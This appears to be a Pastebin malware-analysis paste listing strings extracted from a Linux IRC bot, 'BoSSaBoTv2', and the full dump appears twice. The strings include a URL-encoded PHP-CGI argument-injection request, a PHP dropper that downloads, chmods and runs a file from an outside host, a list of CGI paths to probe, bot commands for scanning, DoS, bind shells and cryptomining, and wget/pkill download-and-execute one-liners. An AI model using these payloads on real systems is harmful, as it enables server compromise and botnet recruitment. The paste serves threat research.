Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Fur Malekal, ELF IRC skids, von #MalwareMustDie
- # Code: BossaBot
- # depacked bins:
- ---------
- 0000000000F4 /lib/ld-linux.so.2
- 00000000087D libpthread.so.0
- 00000000088D waitpid
- 00000000089A connect
- 0000000008A2 pthread_exit
- 0000000008AF pthread_create
- 0000000008BE system
- 0000000008CA accept
- 0000000008D1 write
- 0000000008E1 sendto
- 0000000008ED sigaction
- 0000000008F7 __errno_location
- 000000000908 _Jv_RegisterClasses
- 00000000091C libc.so.6
- 000000000926 strcpy
- 00000000092D ioctl
- 000000000933 stdout
- 00000000093A vsprintf
- 000000000943 strerror
- 00000000094C snprintf
- 000000000955 __strtol_internal
- 000000000967 getpid
- 00000000096E fgets
- 000000000974 memcpy
- 00000000097B pclose
- 000000000987 malloc
- 00000000098E sleep
- 000000000994 sysinfo
- 00000000099C socket
- 0000000009A3 select
- 0000000009AA fflush
- 0000000009B1 alarm
- 0000000009B7 popen
- 0000000009BD calloc
- 0000000009C9 strcat
- 0000000009D5 inet_addr
- 0000000009DF setsockopt
- 0000000009EA strstr
- 0000000009F1 strncpy
- 0000000009F9 strcasecmp
- 000000000A04 __strdup
- 000000000A0D bcopy
- 000000000A13 strtok
- 000000000A1A listen
- 000000000A21 sscanf
- 000000000A28 inet_network
- 000000000A35 memset
- 000000000A3C srand
- 000000000A42 getppid
- 000000000A4F getcwd
- 000000000A56 gethostbyname
- 000000000A64 fgetc
- 000000000A6A fclose
- 000000000A71 __ctype_b_loc
- 000000000A7F access
- 000000000A86 __xstat
- 000000000A8E inet_ntop
- 000000000A98 fopen
- 000000000A9E _IO_stdin_used
- 000000000AAD daemon
- 000000000AB4 __libc_start_main
- 000000000AC6 toupper
- 000000000ACE strchr
- 000000000AD5 fputs
- 000000000ADB mkdir
- 000000000AE1 vfprintf
- 000000000AEF __gmon_start__
- 000000000AFE GLIBC_2.1
- 000000000B08 GLIBC_2.0
- 000000000B12 GLIBC_2.3
- 000000001555 G ]~4=
- 00000000177E t,PRh
- 000000001DDE Sj$h
- 00000000349F YXj:S
- 000000003A1E 4$WSh
- 000000004F25 u&PSh
- 000000005D28 haxmedown.cz.cc
- 000000005D38 %s : USERID : UNIX : %s
- 000000005D51 NOTICE %s :Unknowning %s.
- 000000005D6C NOTICE %s :Unable to comply.
- 000000005D8A /cgi-bin/php
- 000000005D97 /cgi-bin/php5
- 000000005DA5 /cgi-bin/php-cgi
- 000000005DB6 /cgi-bin/php.cgi
- 000000005DC7 /cgi-bin/php4
- 000000005DD5 /cgi-bin/php5-cgi
- 000000005DE7 /cgi-bin/php4-cgi
- 000000005DF9 /cgi-bin/php5.cgi
- 000000005E0B /cgi-bin/php4.cgi
- 000000005E1D /cgi-bin/php52.cgi
- 000000005E30 /cgi-bin/php53.cgi
- 000000005E43 /cgi-bin/
- 000000005E4D /cgi-sys/php-cgi
- 000000005E5E /cgi-bin/info.php
- 000000005E70 /cgi-bin/php.fcgi
- 000000005E82 /cgi-bin/phpinfo.php
- 000000005E9C Permission denied
- 000000005EAE %d.%d.%d.%d
- 000000005EBA %s.%i.%i.%i
- 000000005EC6 %s.%i.%i
- 000000005ECF %s.%i
- 000000005ED5 NOTICE %s :
- 000000005EF3 devchan
- 000000005F03 http://
- 000000005F0C ./cache/
- 000000005F15 %s %s %s
- 000000005F22 HTTP/1.1
- 000000005F2B HTTP/1.0
- 000000005F34 ./cache/%s
- 000000005F3F Date:
- 000000005F45 HTTP/%f %d
- 000000005F50 %%%02X
- 000000005F57 %hu.%hu.%hu.%hu
- 000000005F67 UPDATE
- 000000005F6E UNKNOWN
- 000000005F7B SERVER
- 000000005F82 VERSION
- 000000005F8F SCANRND
- 000000005F97 SCANSUBA
- 000000005FA0 SCANSUBB
- 000000005FA9 SCANSUBC
- 000000005FB7 SHELL
- 000000005FBD PROXY
- 000000005FC3 SOCKS5
- 000000005FCA MINER
- 000000005FD9 NOTICE %s :%s
- 000000005FF8 PRIVMSG
- 000000006005 TOPIC
- 00000000600B /etc/init.d/rc.local
- 000000006020 "%s%s"
- 00000000602A [sshd]
- 000000006036 ERROR
- 00000000603C /etc/rc.conf
- 000000006049 rm -r /tmp/pool*
- 00000000605A dummy
- 000000006060 4L2nJG5V
- 000000006069 NOTICE %s :UPDATEING
- 00000000607F Linux
- 000000006085 NICK %s
- 00000000608E NOTICE %s :NICK <nick>
- 0000000060A6 NOTICE %s :MOVE <server>
- 0000000060C0 MODE %s -x
- 0000000060CC MODE %s +i
- 0000000060D8 JOIN %s :%s
- 0000000060E5 WHO %s
- 0000000060ED PONG %s
- 000000006100 NOTICE %s :Removed all spoofs
- 000000006120 NOTICE %s :What kind of subnet address is that? Do something like: 169.40
- 000000006180 NOTICE %s :Unable to resolve %s
- 0000000061C0 NOTICE %s :UNKNOWN <target> <secs>
- 000000006200 POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D% 0000000065DF 0 Host: %s
- 0000000065E9 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
- 000000006638 Content-Type: application/x-www-form-urlencoded
- 000000006669 Content-Length: %d
- 00000000667D Connection: close
- 0000000066A0 <?php
- 0000000066A6 $tmp = sys_get_temp_dir();
- 0000000066C1 $path = getcwd();
- 0000000066D3 $file = "4L2nJG5V";
- 0000000066E7 $url = "con32.cz.cc";
- 0000000066FD $wget = "wget";
- 00000000670D $flag = "-P - -O";
- 000000006720 $chmod = "chmod -R 777";
- 000000006739 if (file_exists($tmp . "/$file"))
- 00000000675D exit(1);
- 000000006766 }else{
- 00000000676D echo($tmp);
- 000000006779 system("$wget $url $flag" . $tmp . "/$file");
- 0000000067A7 system("$chmod" . $tmp ."/$file");
- 0000000067CA chmod ($tmp."/".$file,0777);
- 0000000067E7 system($tmp . "/$file 2>&1");
- 000000006805 exit(1);
- 000000006820 /cgi-bin/php5.cgi-20120725_by_SAKUR
- 000000006860 /phpMyAdmin/config/config.inc.php
- 0000000068A0 /phpmyadmin/config/config.inc.php
- 0000000068E0 NOTICE %s :
- 0000000068FD [EXPLOiTiNG-IP:-%s-]
- 000000006940 NOTICE %s :
- 00000000695D [Permission-denied:-%s-]
- 0000000069A0 NOTICE %s :
- 0000000069B4 [RANDOM-SCAN-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]-TIME-[-%s-]
- 000000006A00 NOTICE %s :
- 000000006A14 [WAITING-OF-THREADS]
- 000000006A40 NOTICE %s :
- 000000006A54 [SCAN-DONE]
- 000000006A80 NOTICE %s :
- 000000006A94 [SCAN-RUNNING!!!]
- 000000006AC0 NOTICE %s :
- 000000006AD4 [SUBNET-SCAN-A-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006B20 NOTICE %s :
- 000000006B34 [WAITING-OF-THREADS]
- 000000006B60 NOTICE %s :
- 000000006B74 [SCAN-RUNNING!!!
- 000000006BA0 NOTICE %s :
- 000000006BB4 [SUBNET-SCAN-B-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006C00 NOTICE %s :
- 000000006C14 [SUBNET-SCAN-C-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006C60 NOTICE %s :
- 000000006CA0 NOTICE %s :
- 000000006CC2 BoSSaBoTv2 by BoSSaLiNiE
- 000000006CE0 NOTICE %s :
- 000000006D60 NOTICE %s :
- 000000006DA0 NOTICE %s :
- 000000006DC2 HELP
- 000000006DE0 NOTICE %s :
- 000000006DFC PRIVAT PRIVAT PRIVAT
- 000000006E20 NOTICE %s :
- 000000006E3C ALL COMMMANDS STARTS WITH !BOSS* or !BOSS|[500]*
- 000000006E80 NOTICE %s :
- 000000006E9C OR THE COMPLETE BOT !NICKNAME FOR CONTROLL ONLY ONE BOT
- 000000006EE0 NOTICE %s :
- 000000006EFC example !BOSS* scanrnd 192.168 500 30
- 000000006F40 NOTICE %s :
- 000000006F62 SCANNING
- 000000006F80 NOTICE %s :
- 000000006F9C SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> = Random Scan
- 000000007000 NOTICE %s :
- 00000000701C SCANSUBA <192> <threads> = Complete Subnet scan
- 000000007080 NOTICE %s :
- 00000000709C SCANSUBB <192.168> <threads> = Complete Subnet scan
- 000000007100 NOTICE %s :
- 00000000711C SCANSUBC <192.168.0> <threads> = Complete Subnet scan
- 000000007180 NOTICE %s :
- 0000000071A2 DoS
- 0000000071C0 NOTICE %s :
- 0000000071DC UNKNOWN <target> <secs>
- 000000007200 NOTICE %s :
- 00000000721C NOTE YOU CANT STOP RUNNING SCANS
- 000000007240 NOTICE %s :
- 000000007262 WARNING
- 000000007280 NOTICE %s :
- 00000000729C DO NOT ENTER MORE WHITE SPACES THAT ARE NEEDED
- 0000000072E0 NOTICE %s :
- 0000000072FC scanrnd 192.168.0 500 100 IS WRONG BOT WILL NOT SCAN
- 000000007340 NOTICE %s :
- 00000000735C scanrnd 192.168.0 500 100 IS WRONG BOT WILL NOT SCAN
- 0000000073A0 NOTICE %s :
- 0000000073BC scanrnd 192.168.0 500 100 IS RIGHT BOT WILL SCAN
- 000000007400 NOTICE %s :
- 000000007422 REMOTE
- 000000007440 NOTICE %s :
- 00000000745C REMOTE CONTROLL SHELL
- 000000007480 NOTICE %s :
- 00000000749C !BOSS* SH uname -a
- 0000000074C0 NOTICE %s :
- 0000000074DC REMOTE CONTROLL IRC
- 000000007500 NOTICE %s :
- 00000000751C !BOSS* IRC join #bitchly
- 000000007540 NOTICE %s :
- 00000000755C REMOTE BIND SHELL
- 000000007580 NOTICE %s :
- 00000000759C !BOSS* SHELL
- 0000000075C0 NOTICE %s :
- 0000000075DC nc -vvn 192.168.0.1 31337
- 000000007600 NOTICE %s :
- 000000007622 EOH
- 000000007640 NOTICE %s :
- 000000007654 GENERATING
- 000000007680 NOTICE %s :
- 000000007694 STARTING
- 0000000076C0 NOTICE %s :
- 0000000076D4 SOCKET
- 0000000076DD CREATED
- 000000007700 NOTICE %s :
- 000000007740 NOTICE %s :
- 000000007754 WAITING
- 00000000775E CONNECTION
- 000000007780 NOTICE %s :
- 000000007794 INCOMMING
- 0000000077A0 CONNECTION
- 0000000077C9 BoSSaBoTv2
- 0000000077D6 ACCESS
- 0000000077DF GRANTED
- 000000007832 Enter password:
- 00000000786A BoSSaBoTv2
- 000000007877 REMOTE
- 000000007880 SHELL
- 0000000078E0 NOTICE %s :
- 0000000078F4 DISCONNECTED
- 000000007960 NOTICE %s :
- 0000000079A0 NOTICE %s :
- 0000000079B4 SOCKET
- 0000000079BD ERROR
- 0000000079E0 NOTICE %s :
- 0000000079F4 PROXY
- 0000000079FC SERVER
- 000000007A05 READY
- 000000007A20 400 : BAD REQUEST
- 000000007A32 ONLY GET REQUESTS ARE ALLOWED
- 000000007A60 GET %s HTTP/1.0
- 000000007A71 Host: %s
- 000000007A7B If-Modified-Since: %s
- 000000007A92 Connection: close
- 000000007AC0 GET %s HTTP/1.0
- 000000007AD1 Host: %s
- 000000007ADB Connection: close
- 000000007B00 NOTICE %s :
- 000000007B14 SOCKS5
- 000000007B1D SERVER
- 000000007B26 READY
- 000000007B33 PORT %d
- 000000007B40 export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
- 000000007B80 NICK %s
- 000000007B88 USER %s localhost localhost :%s
- 000000007BC0 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
- 000000007C20 pkill minerd ; pkill m32 ; pkill m64
- 000000007C60 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
- 000000007CC0 tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
- 000000007D00 NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s
- 000000007D40 pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s
- 000000007E00 NOTICE %s :
- 000000007E1D BoSSaBoTv2-%s
- 000000007E60 NOTICE %s :Nick cannot be larger than 9 characters.
- 000000008361 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008394 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0000000083C7 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0000000083FA GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 00000000842D GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008460 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008493 .shstrtab
- 00000000849D .interp
- 0000000084A5 .note.ABI-tag
- 0000000084B3 .hash
- 0000000084B9 .dynsym
- 0000000084C1 .dynstr
- 0000000084C9 .gnu.version
- 0000000084D6 .gnu.version_r
- 0000000084E5 .rel.dyn
- 0000000084EE .rel.plt
- 0000000084F7 .init
- 0000000084FD .text
- 000000008503 .fini
- 000000008509 .rodata
- 000000008511 .eh_frame
- 00000000851B .data
- 000000008521 .dynamic
- 00000000852A .ctors
- 000000008531 .dtors
- 000000008547 .comment
- 0000000000F4 /lib/ld-linux.so.2
- 00000000087D libpthread.so.0
- 00000000088D waitpid
- 00000000089A connect
- 0000000008A2 pthread_exit
- 0000000008AF pthread_create
- 0000000008BE system
- 0000000008CA accept
- 0000000008D1 write
- 0000000008E1 sendto
- 0000000008ED sigaction
- 0000000008F7 __errno_location
- 000000000908 _Jv_RegisterClasses
- 00000000091C libc.so.6
- 000000000926 strcpy
- 00000000092D ioctl
- 000000000933 stdout
- 00000000093A vsprintf
- 000000000943 strerror
- 00000000094C snprintf
- 000000000955 __strtol_internal
- 000000000967 getpid
- 00000000096E fgets
- 000000000974 memcpy
- 00000000097B pclose
- 000000000987 malloc
- 00000000098E sleep
- 000000000994 sysinfo
- 00000000099C socket
- 0000000009A3 select
- 0000000009AA fflush
- 0000000009B1 alarm
- 0000000009B7 popen
- 0000000009BD calloc
- 0000000009C9 strcat
- 0000000009D5 inet_addr
- 0000000009DF setsockopt
- 0000000009EA strstr
- 0000000009F1 strncpy
- 0000000009F9 strcasecmp
- 000000000A04 __strdup
- 000000000A0D bcopy
- 000000000A13 strtok
- 000000000A1A listen
- 000000000A21 sscanf
- 000000000A28 inet_network
- 000000000A35 memset
- 000000000A3C srand
- 000000000A42 getppid
- 000000000A4F getcwd
- 000000000A56 gethostbyname
- 000000000A64 fgetc
- 000000000A6A fclose
- 000000000A71 __ctype_b_loc
- 000000000A7F access
- 000000000A86 __xstat
- 000000000A8E inet_ntop
- 000000000A98 fopen
- 000000000A9E _IO_stdin_used
- 000000000AAD daemon
- 000000000AB4 __libc_start_main
- 000000000AC6 toupper
- 000000000ACE strchr
- 000000000AD5 fputs
- 000000000ADB mkdir
- 000000000AE1 vfprintf
- 000000000AEF __gmon_start__
- 000000000AFE GLIBC_2.1
- 000000000B08 GLIBC_2.0
- 000000000B12 GLIBC_2.3
- 000000001555 G ]~4=
- 00000000177E t,PRh
- 000000001DDE Sj$h
- 00000000349F YXj:S
- 000000003A1E 4$WSh
- 000000004F25 u&PSh
- 000000005D28 haxmedown.cz.cc
- 000000005D38 %s : USERID : UNIX : %s
- 000000005D51 NOTICE %s :Unknowning %s.
- 000000005D6C NOTICE %s :Unable to comply.
- 000000005D8A /cgi-bin/php
- 000000005D97 /cgi-bin/php5
- 000000005DA5 /cgi-bin/php-cgi
- 000000005DB6 /cgi-bin/php.cgi
- 000000005DC7 /cgi-bin/php4
- 000000005DD5 /cgi-bin/php5-cgi
- 000000005DE7 /cgi-bin/php4-cgi
- 000000005DF9 /cgi-bin/php5.cgi
- 000000005E0B /cgi-bin/php4.cgi
- 000000005E1D /cgi-bin/php52.cgi
- 000000005E30 /cgi-bin/php53.cgi
- 000000005E43 /cgi-bin/
- 000000005E4D /cgi-sys/php-cgi
- 000000005E5E /cgi-bin/info.php
- 000000005E70 /cgi-bin/php.fcgi
- 000000005E82 /cgi-bin/phpinfo.php
- 000000005E9C Permission denied
- 000000005EAE %d.%d.%d.%d
- 000000005EBA %s.%i.%i.%i
- 000000005EC6 %s.%i.%i
- 000000005ECF %s.%i
- 000000005ED5 NOTICE %s :
- 000000005EF3 devchan
- 000000005F03 http://
- 000000005F0C ./cache/
- 000000005F15 %s %s %s
- 000000005F22 HTTP/1.1
- 000000005F2B HTTP/1.0
- 000000005F34 ./cache/%s
- 000000005F3F Date:
- 000000005F45 HTTP/%f %d
- 000000005F50 %%%02X
- 000000005F57 %hu.%hu.%hu.%hu
- 000000005F67 UPDATE
- 000000005F6E UNKNOWN
- 000000005F7B SERVER
- 000000005F82 VERSION
- 000000005F8F SCANRND
- 000000005F97 SCANSUBA
- 000000005FA0 SCANSUBB
- 000000005FA9 SCANSUBC
- 000000005FB7 SHELL
- 000000005FBD PROXY
- 000000005FC3 SOCKS5
- 000000005FCA MINER
- 000000005FD9 NOTICE %s :%s
- 000000005FF8 PRIVMSG
- 000000006005 TOPIC
- 00000000600B /etc/init.d/rc.local
- 000000006020 "%s%s"
- 00000000602A [sshd]
- 000000006036 ERROR
- 00000000603C /etc/rc.conf
- 000000006049 rm -r /tmp/pool*
- 00000000605A dummy
- 000000006060 4L2nJG5V
- 000000006069 NOTICE %s :UPDATEING
- 00000000607F Linux
- 000000006085 NICK %s
- 00000000608E NOTICE %s :NICK <nick>
- 0000000060A6 NOTICE %s :MOVE <server>
- 0000000060C0 MODE %s -x
- 0000000060CC MODE %s +i
- 0000000060D8 JOIN %s :%s
- 0000000060E5 WHO %s
- 0000000060ED PONG %s
- 000000006100 NOTICE %s :Removed all spoofs
- 000000006120 NOTICE %s :What kind of subnet address is that? Do something like: 169.40
- 000000006180 NOTICE %s :Unable to resolve %s
- 0000000061C0 NOTICE %s :UNKNOWN <target> <secs>
- 000000006200 POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D% 0000000065DF 0 Host: %s
- 0000000065E9 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
- 000000006638 Content-Type: application/x-www-form-urlencoded
- 000000006669 Content-Length: %d
- 00000000667D Connection: close
- 0000000066A0 <?php
- 0000000066A6 $tmp = sys_get_temp_dir();
- 0000000066C1 $path = getcwd();
- 0000000066D3 $file = "4L2nJG5V";
- 0000000066E7 $url = "con32.cz.cc";
- 0000000066FD $wget = "wget";
- 00000000670D $flag = "-P - -O";
- 000000006720 $chmod = "chmod -R 777";
- 000000006739 if (file_exists($tmp . "/$file"))
- 00000000675D exit(1);
- 000000006766 }else{
- 00000000676D echo($tmp);
- 000000006779 system("$wget $url $flag" . $tmp . "/$file");
- 0000000067A7 system("$chmod" . $tmp ."/$file");
- 0000000067CA chmod ($tmp."/".$file,0777);
- 0000000067E7 system($tmp . "/$file 2>&1");
- 000000006805 exit(1);
- 000000006820 /cgi-bin/php5.cgi-20120725_by_SAKUR
- 000000006860 /phpMyAdmin/config/config.inc.php
- 0000000068A0 /phpmyadmin/config/config.inc.php
- 0000000068E0 NOTICE %s :
- 0000000068FD [EXPLOiTiNG-IP:-%s-]
- 000000006940 NOTICE %s :
- 00000000695D [Permission-denied:-%s-]
- 0000000069A0 NOTICE %s :
- 0000000069B4 [RANDOM-SCAN-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]-TIME-[-%s-]
- 000000006A00 NOTICE %s :
- 000000006A14 [WAITING-OF-THREADS]
- 000000006A40 NOTICE %s :
- 000000006A54 [SCAN-DONE]
- 000000006A80 NOTICE %s :
- 000000006A94 [SCAN-RUNNING!!!]
- 000000006AC0 NOTICE %s :
- 000000006AD4 [SUBNET-SCAN-A-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006B20 NOTICE %s :
- 000000006B34 [WAITING-OF-THREADS]
- 000000006B60 NOTICE %s :
- 000000006B74 [SCAN-RUNNING!!!
- 000000006BA0 NOTICE %s :
- 000000006BB4 [SUBNET-SCAN-B-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006C00 NOTICE %s :
- 000000006C14 [SUBNET-SCAN-C-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006C60 NOTICE %s :
- 000000006CA0 NOTICE %s :
- 000000006CC2 BoSSaBoTv2 by BoSSaLiNiE
- 000000006CE0 NOTICE %s :
- 000000006D60 NOTICE %s :
- 000000006DA0 NOTICE %s :
- 000000006DC2 HELP
- 000000006DE0 NOTICE %s :
- 000000006DFC PRIVAT PRIVAT PRIVAT
- 000000006E20 NOTICE %s :
- 000000006E3C ALL COMMMANDS STARTS WITH !BOSS* or !BOSS|[500]*
- 000000006E80 NOTICE %s :
- 000000006E9C OR THE COMPLETE BOT !NICKNAME FOR CONTROLL ONLY ONE BOT
- 000000006EE0 NOTICE %s :
- 000000006EFC example !BOSS* scanrnd 192.168 500 30
- 000000006F40 NOTICE %s :
- 000000006F62 SCANNING
- 000000006F80 NOTICE %s :
- 000000006F9C SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> = Random Scan
- 000000007000 NOTICE %s :
- 00000000701C SCANSUBA <192> <threads> = Complete Subnet scan
- 000000007080 NOTICE %s :
- 00000000709C SCANSUBB <192.168> <threads> = Complete Subnet scan
- 000000007100 NOTICE %s :
- 00000000711C SCANSUBC <192.168.0> <threads> = Complete Subnet scan
- 000000007180 NOTICE %s :
- 0000000071A2 DoS
- 0000000071C0 NOTICE %s :
- 0000000071DC UNKNOWN <target> <secs>
- 000000007200 NOTICE %s :
- 00000000721C NOTE YOU CANT STOP RUNNING SCANS
- 000000007240 NOTICE %s :
- 000000007262 WARNING
- 000000007280 NOTICE %s :
- 00000000729C DO NOT ENTER MORE WHITE SPACES THAT ARE NEEDED
- 0000000072E0 NOTICE %s :
- 0000000072FC scanrnd 192.168.0 500 100 IS WRONG BOT WILL NOT SCAN
- 000000007340 NOTICE %s :
- 00000000735C scanrnd 192.168.0 500 100 IS WRONG BOT WILL NOT SCAN
- 0000000073A0 NOTICE %s :
- 0000000073BC scanrnd 192.168.0 500 100 IS RIGHT BOT WILL SCAN
- 000000007400 NOTICE %s :
- 000000007422 REMOTE
- 000000007440 NOTICE %s :
- 00000000745C REMOTE CONTROLL SHELL
- 000000007480 NOTICE %s :
- 00000000749C !BOSS* SH uname -a
- 0000000074C0 NOTICE %s :
- 0000000074DC REMOTE CONTROLL IRC
- 000000007500 NOTICE %s :
- 00000000751C !BOSS* IRC join #bitchly
- 000000007540 NOTICE %s :
- 00000000755C REMOTE BIND SHELL
- 000000007580 NOTICE %s :
- 00000000759C !BOSS* SHELL
- 0000000075C0 NOTICE %s :
- 0000000075DC nc -vvn 192.168.0.1 31337
- 000000007600 NOTICE %s :
- 000000007622 EOH
- 000000007640 NOTICE %s :
- 000000007654 GENERATING
- 000000007680 NOTICE %s :
- 000000007694 STARTING
- 0000000076C0 NOTICE %s :
- 0000000076D4 SOCKET
- 0000000076DD CREATED
- 000000007700 NOTICE %s :
- 000000007740 NOTICE %s :
- 000000007754 WAITING
- 00000000775E CONNECTION
- 000000007780 NOTICE %s :
- 000000007794 INCOMMING
- 0000000077A0 CONNECTION
- 0000000077C9 BoSSaBoTv2
- 0000000077D6 ACCESS
- 0000000077DF GRANTED
- 000000007832 Enter password:
- 00000000786A BoSSaBoTv2
- 000000007877 REMOTE
- 000000007880 SHELL
- 0000000078E0 NOTICE %s :
- 0000000078F4 DISCONNECTED
- 000000007960 NOTICE %s :
- 0000000079A0 NOTICE %s :
- 0000000079B4 SOCKET
- 0000000079BD ERROR
- 0000000079E0 NOTICE %s :
- 0000000079F4 PROXY
- 0000000079FC SERVER
- 000000007A05 READY
- 000000007A20 400 : BAD REQUEST
- 000000007A32 ONLY GET REQUESTS ARE ALLOWED
- 000000007A60 GET %s HTTP/1.0
- 000000007A71 Host: %s
- 000000007A7B If-Modified-Since: %s
- 000000007A92 Connection: close
- 000000007AC0 GET %s HTTP/1.0
- 000000007AD1 Host: %s
- 000000007ADB Connection: close
- 000000007B00 NOTICE %s :
- 000000007B14 SOCKS5
- 000000007B1D SERVER
- 000000007B26 READY
- 000000007B33 PORT %d
- 000000007B40 export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
- 000000007B80 NICK %s
- 000000007B88 USER %s localhost localhost :%s
- 000000007BC0 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
- 000000007C20 pkill minerd ; pkill m32 ; pkill m64
- 000000007C60 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
- 000000007CC0 tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
- 000000007D00 NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s
- 000000007D40 pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s
- 000000007E00 NOTICE %s :
- 000000007E1D BoSSaBoTv2-%s
- 000000007E60 NOTICE %s :Nick cannot be larger than 9 characters.
- 000000008361 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008394 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0000000083C7 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0000000083FA GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 00000000842D GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008460 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008493 .shstrtab
- 00000000849D .interp
- 0000000084A5 .note.ABI-tag
- 0000000084B3 .hash
- 0000000084B9 .dynsym
- 0000000084C1 .dynstr
- 0000000084C9 .gnu.version
- 0000000084D6 .gnu.version_r
- 0000000084E5 .rel.dyn
- 0000000084EE .rel.plt
- 0000000084F7 .init
- 0000000084FD .text
- 000000008503 .fini
- 000000008509 .rodata
- 000000008511 .eh_frame
- 00000000851B .data
- 000000008521 .dynamic
- 00000000852A .ctors
- 000000008531 .dtors
- 000000008547 .comment
- # Downloaded payload
- # logged:
